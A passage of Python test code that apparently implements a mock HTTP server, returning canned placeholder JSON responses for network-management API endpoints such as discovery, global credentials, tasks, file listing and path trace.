response_content = json.dumps({'response': [{'attributeInfo': {}, 'cliStatus': 'string', 'discoveryStatus': 'string', 'endTime': 'string', 'httpStatus': 'string', 'id': 'string', 'inventoryCollectionStatus': 'string', 'inventoryReachabilityStatus': 'string', 'ipAddress': 'string', 'jobStatus': 'string', 'name': 'string', 'netconfStatus': 'string', 'pingStatus': 'string', 'snmpStatus': 'string', 'startTime': 'string', 'taskId': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_979688084b7ba60d(self):
return re.search(
self.NETWORK_DISCOVERY_979688084b7ba60d_PATTERN,
self.path
)
def network_discovery_create_snmpv3credentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_a5ac99774c6bb541(self):
return re.search(
self.NETWORK_DISCOVERY_a5ac99774c6bb541_PATTERN,
self.path
)
def network_discovery_create_update_snmpproperties_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_9788b8fc4418831d(self):
return re.search(
self.NETWORK_DISCOVERY_9788b8fc4418831d_PATTERN,
self.path
)
def network_discovery_updatesdiscoveryby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_b68a6bd8473a9a25(self):
return re.search(
self.NETWORK_DISCOVERY_b68a6bd8473a9a25_PATTERN,
self.path
)
def network_discovery_update_httpwritecredentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_c1ba9a424c08a01b(self):
return re.search(
self.NETWORK_DISCOVERY_c1ba9a424c08a01b_PATTERN,
self.path
)
def network_discovery_deletediscoverybyspecifiedrange_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_db8e09234a988bab(self):
return re.search(
self.NETWORK_DISCOVERY_db8e09234a988bab_PATTERN,
self.path
)
def network_discovery_deletealldiscovery_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_a6965b454c9a8663(self):
return re.search(
self.NETWORK_DISCOVERY_a6965b454c9a8663_PATTERN,
self.path
)
def network_discovery_get_devicesdiscoveredby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_f5ac590c4ca9975a(self):
return re.search(
self.NETWORK_DISCOVERY_f5ac590c4ca9975a_PATTERN,
self.path
)
def network_discovery_deleteglobalcredentialsby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_fba0d80747eb82e8(self):
return re.search(
self.NETWORK_DISCOVERY_fba0d80747eb82e8_PATTERN,
self.path
)
def network_discovery_update_cli_credentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_bf859ac64a0ba19c(self):
return re.search(
self.NETWORK_DISCOVERY_bf859ac64a0ba19c_PATTERN,
self.path
)
def network_discovery_create_httpreadcredentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_c5acd9fa4c1a8abc(self):
return re.search(
self.NETWORK_DISCOVERY_c5acd9fa4c1a8abc_PATTERN,
self.path
)
def network_discovery_update_netconfcredentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_58a3699e489b9529(self):
return re.search(
self.NETWORK_DISCOVERY_58a3699e489b9529_PATTERN,
self.path
)
def network_discovery_get_credentialsubtypebycredential_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 'string', 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_709fda3c42b8877a(self):
return re.search(
self.NETWORK_DISCOVERY_709fda3c42b8877a_PATTERN,
self.path
)
def network_discovery_updateglobalcredentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_7aa3da9d4e098ef2(self):
return re.search(
self.NETWORK_DISCOVERY_7aa3da9d4e098ef2_PATTERN,
self.path
)
def network_discovery_create_snmpreadcommunity_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_a4967be64dfaaa1a(self):
return re.search(
self.NETWORK_DISCOVERY_a4967be64dfaaa1a_PATTERN,
self.path
)
def network_discovery_get_discoveryjobsby_ip_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'attributeInfo': {}, 'cliStatus': 'string', 'discoveryStatus': 'string', 'endTime': 'string', 'httpStatus': 'string', 'id': 'string', 'inventoryCollectionStatus': 'string', 'inventoryReachabilityStatus': 'string', 'ipAddress': 'string', 'jobStatus': 'string', 'name': 'string', 'netconfStatus': 'string', 'pingStatus': 'string', 'snmpStatus': 'string', 'startTime': 'string', 'taskId': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_a6b798ab4acaa34e(self):
return re.search(
self.NETWORK_DISCOVERY_a6b798ab4acaa34e_PATTERN,
self.path
)
def network_discovery_get_discovereddevicesbyrange_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'anchorWlcForAp': 'string', 'authModelId': 'string', 'avgUpdateFrequency': 0, 'bootDateTime': 'string', 'cliStatus': 'string', 'duplicateDeviceId': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'httpStatus': 'string', 'id': 'string', 'imageName': 'string', 'ingressQueueConfig': 'string', 'interfaceCount': 'string', 'inventoryCollectionStatus': 'string', 'inventoryReachabilityStatus': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'netconfStatus': 'string', 'numUpdates': 0, 'pingStatus': 'string', 'platformId': 'string', 'portRange': 'string', 'qosStatus': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'snmpStatus': 'string', 'softwareVersion': 'string', 'tag': 'string', 'tagCount': 0, 'type': 'string', 'upTime': 'string', 'vendor': 'string', 'wlcApDeviceStatus': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_ff816b8e435897eb(self):
return re.search(
self.NETWORK_DISCOVERY_ff816b8e435897eb_PATTERN,
self.path
)
def network_discovery_get_globalcredentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_f6ac994f451ba011(self):
return re.search(
self.NETWORK_DISCOVERY_f6ac994f451ba011_PATTERN,
self.path
)
def network_discovery_get_discoverednetworkdevicesbydiscovery_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'anchorWlcForAp': 'string', 'authModelId': 'string', 'avgUpdateFrequency': 0, 'bootDateTime': 'string', 'cliStatus': 'string', 'duplicateDeviceId': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'httpStatus': 'string', 'id': 'string', 'imageName': 'string', 'ingressQueueConfig': 'string', 'interfaceCount': 'string', 'inventoryCollectionStatus': 'string', 'inventoryReachabilityStatus': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'netconfStatus': 'string', 'numUpdates': 0, 'pingStatus': 'string', 'platformId': 'string', 'portRange': 'string', 'qosStatus': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'snmpStatus': 'string', 'softwareVersion': 'string', 'tag': 'string', 'tagCount': 0, 'type': 'string', 'upTime': 'string', 'vendor': 'string', 'wlcApDeviceStatus': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TASK_26b44ab04649a183(self):
return re.search(
self.TASK_26b44ab04649a183_PATTERN,
self.path
)
def task_gettaskcount_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TASK_a1a9387346ba92b1(self):
return re.search(
self.TASK_a1a9387346ba92b1_PATTERN,
self.path
)
def task_gettaskby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'additionalStatusURL': 'string', 'data': 'string', 'endTime': 'string', 'errorCode': 'string', 'errorKey': 'string', 'failureReason': 'string', 'id': 'string', 'instanceTenantId': 'string', 'isError': True, 'lastUpdate': 'string', 'operationIdList': {}, 'parentId': 'string', 'progress': 'string', 'rootId': 'string', 'serviceType': 'string', 'startTime': 'string', 'username': 'string', 'version': 0}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TASK_e78bb8a2449b9eed(self):
return re.search(
self.TASK_e78bb8a2449b9eed_PATTERN,
self.path
)
def task_gettasks_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'additionalStatusURL': 'string', 'data': 'string', 'endTime': 'string', 'errorCode': 'string', 'errorKey': 'string', 'failureReason': 'string', 'id': 'string', 'instanceTenantId': 'string', 'isError': True, 'lastUpdate': 'string', 'operationIdList': {}, 'parentId': 'string', 'progress': 'string', 'rootId': 'string', 'serviceType': 'string', 'startTime': 'string', 'username': 'string', 'version': 0}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TASK_f5a269c44f2a95fa(self):
return re.search(
self.TASK_f5a269c44f2a95fa_PATTERN,
self.path
)
def task_gettasktree_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'additionalStatusURL': 'string', 'data': 'string', 'endTime': 'string', 'errorCode': 'string', 'errorKey': 'string', 'failureReason': 'string', 'id': 'string', 'instanceTenantId': 'string', 'isError': True, 'lastUpdate': 'string', 'operationIdList': {}, 'parentId': 'string', 'progress': 'string', 'rootId': 'string', 'serviceType': 'string', 'startTime': 'string', 'username': 'string', 'version': 0}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TASK_e487f8d3481b94f2(self):
return re.search(
self.TASK_e487f8d3481b94f2_PATTERN,
self.path
)
def task_gettaskby_operation_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'additionalStatusURL': 'string', 'data': 'string', 'endTime': 'string', 'errorCode': 'string', 'errorKey': 'string', 'failureReason': 'string', 'id': 'string', 'instanceTenantId': 'string', 'isError': True, 'lastUpdate': 'string', 'operationIdList': {}, 'parentId': 'string', 'progress': 'string', 'rootId': 'string', 'serviceType': 'string', 'startTime': 'string', 'username': 'string', 'version': 0}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_COMMAND_RUNNER_33bb2b9d40199e14(self):
return re.search(
self.COMMAND_RUNNER_33bb2b9d40199e14_PATTERN,
self.path
)
def command_runner_getallkeywordsof_cli_saccepted_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': ['string'], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_COMMAND_RUNNER_d6b8ca774739adf4(self):
return re.search(
self.COMMAND_RUNNER_d6b8ca774739adf4_PATTERN,
self.path
)
def command_runner_runread_onlycommandsondevices_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_FILE_3f89bbfc4f6b8b50(self):
return re.search(
self.FILE_3f89bbfc4f6b8b50_PATTERN,
self.path
)
def file_getlistofavailablenamespaces_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': ['string'], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_FILE_42b6a86e44b8bdfc(self):
return re.search(
self.FILE_42b6a86e44b8bdfc_PATTERN,
self.path
)
def file_getlistoffiles_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'attributeInfo': {}, 'downloadPath': 'string', 'encrypted': True, 'fileFormat': 'string', 'fileSize': 'string', 'id': 'string', 'md5Checksum': 'string', 'name': 'string', 'nameSpace': 'string', 'sftpServerList': [{}], 'sha1Checksum': 'string', 'taskId': {}}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_FILE_9698c8ec4a0b8c1a(self):
return re.search(
self.FILE_9698c8ec4a0b8c1a_PATTERN,
self.path
)
def file_downloadafilebyfile_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PATH_TRACE_55bc3bf94e38b6ff(self):
return re.search(
self.PATH_TRACE_55bc3bf94e38b6ff_PATTERN,
self.path
)
def path_trace_retrivesallprevious_pathtracessummary_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'controlPath': True, 'createTime': 0, 'destIP': 'string', 'destPort': 'string', 'failureReason': 'string', 'id': 'string', 'inclusions': ['string'], 'lastUpdateTime': 0, 'periodicRefresh': True, 'protocol': 'string', 'sourceIP': 'string', 'sourcePort': 'string', 'status': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PATH_TRACE_7ab9a8bd4f3b86a4(self):
return re.search(
self.PATH_TRACE_7ab9a8bd4f3b86a4_PATTERN,
self.path
)
def path_trace_retrievesprevious_pathtrace_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'detailedStatus': {'aclTraceCalculation': 'string', 'aclTraceCalculationFailureReason': 'string'}, 'lastUpdate': 'string', 'networkElements': [{'accuracyList': [{'percent': 0, 'reason': 'string'}], 'detailedStatus': {'aclTraceCalculation': 'string', 'aclTraceCalculationFailureReason': 'string'}, 'deviceStatistics': {'cpuStatistics': {'fiveMinUsageInPercentage': 0, 'fiveSecsUsageInPercentage': 0, 'oneMinUsageInPercentage': 0, 'refreshedAt': 0}, 'memoryStatistics': {'memoryUsage': 0, 'refreshedAt': 0, 'totalMemory': 0}}, 'deviceStatsCollection': 'string', 'deviceStatsCollectionFailureReason': 'string', 'egressPhysicalInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'egressVirtualInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'flexConnect': {'authentication': 'LOCAL', 'dataSwitching': 'LOCAL', 'egressAclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'ingressAclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'wirelessLanControllerId': 'string', 'wirelessLanControllerName': 'string'}, 'id': 'string', 'ingressPhysicalInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'ingressVirtualInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'ip': 'string', 'linkInformationSource': 'string', 'name': 'string', 'perfMonCollection': 'string', 'perfMonCollectionFailureReason': 'string', 'perfMonStatistics': [{'byteRate': 0, 'destIpAddress': 'string', 'destPort': 'string', 'inputInterface': 'string', 'ipv4DSCP': 'string', 'ipv4TTL': 0, 'outputInterface': 'string', 'packetBytes': 0, 'packetCount': 0, 'packetLoss': 0, 'packetLossPercentage': 0, 'protocol': 'string', 'refreshedAt': 0, 'rtpJitterMax': 0, 'rtpJitterMean': 0, 'rtpJitterMin': 0, 'sourceIpAddress': 'string', 'sourcePort': 'string'}], 'role': 'string', 'ssid': 'string', 'tunnels': ['string'], 'type': 'string', 'wlanId': 'string'}], 'networkElementsInfo': [{'accuracyList': [{'percent': 0, 'reason': 'string'}], 'detailedStatus': {'aclTraceCalculation': 'string', 'aclTraceCalculationFailureReason': 'string'}, 'deviceStatistics': {'cpuStatistics': {'fiveMinUsageInPercentage': 0, 'fiveSecsUsageInPercentage': 0, 'oneMinUsageInPercentage': 0, 'refreshedAt': 0}, 'memoryStatistics': {'memoryUsage': 0, 'refreshedAt': 0, 'totalMemory': 0}}, 'deviceStatsCollection': 'string', 'deviceStatsCollectionFailureReason': 'string', 'egressInterface': {'physicalInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'virtualInterface': [{'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}]}, 'flexConnect': {'authentication': 'LOCAL', 'dataSwitching': 'LOCAL', 'egressAclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 